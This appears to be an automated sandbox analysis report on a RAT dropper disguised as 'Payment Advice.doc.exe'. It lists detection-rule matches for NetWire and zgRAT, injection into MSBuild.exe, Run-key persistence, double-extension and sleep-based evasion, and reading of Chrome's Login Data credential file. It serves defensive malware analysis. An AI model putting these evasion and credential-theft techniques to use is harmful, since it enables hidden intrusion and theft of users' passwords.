              Source: 0000001C.00000000.463163669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.450308266.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 0000001C.00000000.444253682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NetWire author = ditekSHen, description = Detects NetWire RAT
              Source: 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
              Source: C:\Users\user\AppData\Local\word.exe, type: DROPPEDMatched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_00F47CA019_2_00F47CA0
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_00F47C2F19_2_00F47C2F
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6658120_2_00C66581
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C62C2020_2_00C62C20
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6284120_2_00C62841
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6285020_2_00C62850
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C62C1F20_2_00C62C1F
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_028B7CA020_2_028B7CA0
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_028B7C2F20_2_028B7C2F
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_028B7C7F20_2_028B7C7F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0040304728_2_00403047
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0041D04928_2_0041D049
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0041946328_2_00419463
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0041507928_2_00415079
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0042042028_2_00420420
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_004208C028_2_004208C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_004034D328_2_004034D3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0041497628_2_00414976
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_00402E6828_2_00402E68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0041661928_2_00416619
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0040AEC628_2_0040AEC6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_00402AFC28_2_00402AFC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_00415ABF28_2_00415ABF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_00420F4028_2_00420F40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0041FF5028_2_0041FF50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0040A72828_2_0040A728
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004081AA appears 110 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0041F724 appears 31 times
              Source: Payment Advice.doc.exe, 00000000.00000000.242151423.0000000000F32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrdbffygq.exe6 vs Payment Advice.doc.exe
              Source: Payment Advice.doc.exeBinary or memory string: OriginalFilenameBrdbffygq.exe6 vs Payment Advice.doc.exe
              Source: Payment Advice.doc.exeReversingLabs: Detection: 41%
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeFile read: C:\Users\user\Desktop\Payment Advice.doc.exeJump to behavior
              Source: Payment Advice.doc.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Payment Advice.doc.exe "C:\Users\user\Desktop\Payment Advice.doc.exe"
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: unknownProcess created: C:\Users\user\AppData\Local\word.exe "C:\Users\user\AppData\Local\word.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\word.exe "C:\Users\user\AppData\Local\word.exe"
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              Source: C:\Users\user\AppData\Local\word.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\AppData\Local\word.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeFile created: C:\Users\user\AppData\Local\word.exeJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/3@3/1
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\-
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6452:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Payment Advice.doc.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: Payment Advice.doc.exeStatic file information: File size 1526784 > 1048576
              Source: Payment Advice.doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Payment Advice.doc.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x165c00
              Source: Payment Advice.doc.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: Payment Advice.doc.exe, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: word.exe.0.dr, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.Payment Advice.doc.exe.f30000.0.unpack, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 19.0.word.exe.310000.0.unpack, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 19.2.word.exe.310000.0.unpack, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 20.0.word.exe.390000.0.unpack, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 20.2.word.exe.390000.0.unpack, Kbhrk/DescriptorClientItem.cs.Net Code: InsertState System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeCode function: 0_2_00F32C1C push ecx; retf 0_2_00F32C22
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_00312C1C push ecx; retf 19_2_00312C22
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_00F05D38 push eax; retf 19_2_00F05D49
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_00F49CC1 push 00000004h; ret 19_2_00F49CD5
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_04D41DE9 push ss; iretd 19_2_04D41DEA
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_04D41E08 push ss; iretd 19_2_04D41E0E
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_04D41E29 push ss; iretd 19_2_04D41E2F
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_04D461F7 push E80C875Eh; retf 19_2_04D46201
              Source: C:\Users\user\AppData\Local\word.exeCode function: 19_2_04D4493E push ebp; iretd 19_2_04D44940
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00392C1C push ecx; retf 20_2_00392C22
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C644F0 push ds; retf 20_2_00C644FA
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C62408 push cs; retf 20_2_00C6240E
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6367C push cs; retf 20_2_00C6367E
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6C8DE push es; retf 20_2_00C6C8E0
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C649FC pushfd ; retf 0000h20_2_00C64A12
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6093F push ecx; retf 20_2_00C60946
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C64A91 pushfd ; retf 0000h20_2_00C64A92
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C64A51 pushfd ; retf 0000h20_2_00C64A52
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6CA75 push es; retf 20_2_00C6CA77
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C64A30 pushfd ; retf 0000h20_2_00C64A32
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C64A3D push ds; retf 20_2_00C64A3E
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6CB95 push es; retf 20_2_00C6CB97
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6CBA2 push es; retf 20_2_00C6CBA7
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_00C6CD5F push es; retf 20_2_00C6CD6A
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_028B6666 pushad ; retf 20_2_028B666F
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_028B6679 pushad ; retf 20_2_028B667A
              Source: C:\Users\user\AppData\Local\word.exeCode function: 20_2_028B2ADF push es; retf 20_2_028B2AEF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_00409E61 push eax; mov dword ptr [esp], ebx28_2_00409FDE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0040DCE9 push ecx; mov dword ptr [esp], 00423976h28_2_0040DD9F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0040DCE9 push ebp; mov dword ptr [esp], 0042398Ah28_2_0040DDD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 28_2_0040DCE9 push edx; mov dword ptr [esp], 00423997h28_2_0040DDF7
              Source: Payment Advice.doc.exeStatic PE information: 0x858D4DE3 [Tue Jan 1 05:17:23 2041 UTC]
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeFile created: C:\Users\user\AppData\Local\word.exeJump to dropped file
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wordJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wordJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses an obfuscated file name to hide its real file extension (double extension)
              Source: Possible double extension: doc.exeStatic PE information: Payment Advice.doc.exe
              Source: C:\Users\user\AppData\Local\word.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exe TID: 6288Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 5844Thread sleep count: 162 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\timeout.exe TID: 3980Thread sleep count: 57 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\timeout.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: word.exe, 00000013.00000002.526770382.0000000004540000.00000004.00000800.00020000.00000000.sdmp, word.exe, 00000013.00000002.528312106.0000000008000000.00000004.08000000.00040000.00000000.sdmp, word.exe, 00000014.00000002.527972501.0000000008130000.00000004.08000000.00040000.00000000.sdmp, word.exe, 00000014.00000002.525884297.0000000004650000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: nNECPliQeMupsLrgG3v
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 427000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 42F000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 432000Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 83C008Jump to behavior
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Users\user\AppData\Local\word.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 20Jump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeQueries volume information: C:\Users\user\Desktop\Payment Advice.doc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Advice.doc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeQueries volume information: C:\Users\user\AppData\Local\word.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\word.exeQueries volume information: C:\Users\user\AppData\Local\word.exe VolumeInformationJump to behavior

              Stealing of Sensitive Information

              barindex
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: %s\Google\Chrome\User Data\Default\Login Data28_2_0040F281
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: %s\Chromium\User Data\Default\Login Data28_2_0040F382

              Remote Access Functionality

              barindex
              Yara detected NetWire RAT
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 28.0.MSBuild.exe.400000.7.unpack, type: UNPACKEDPE
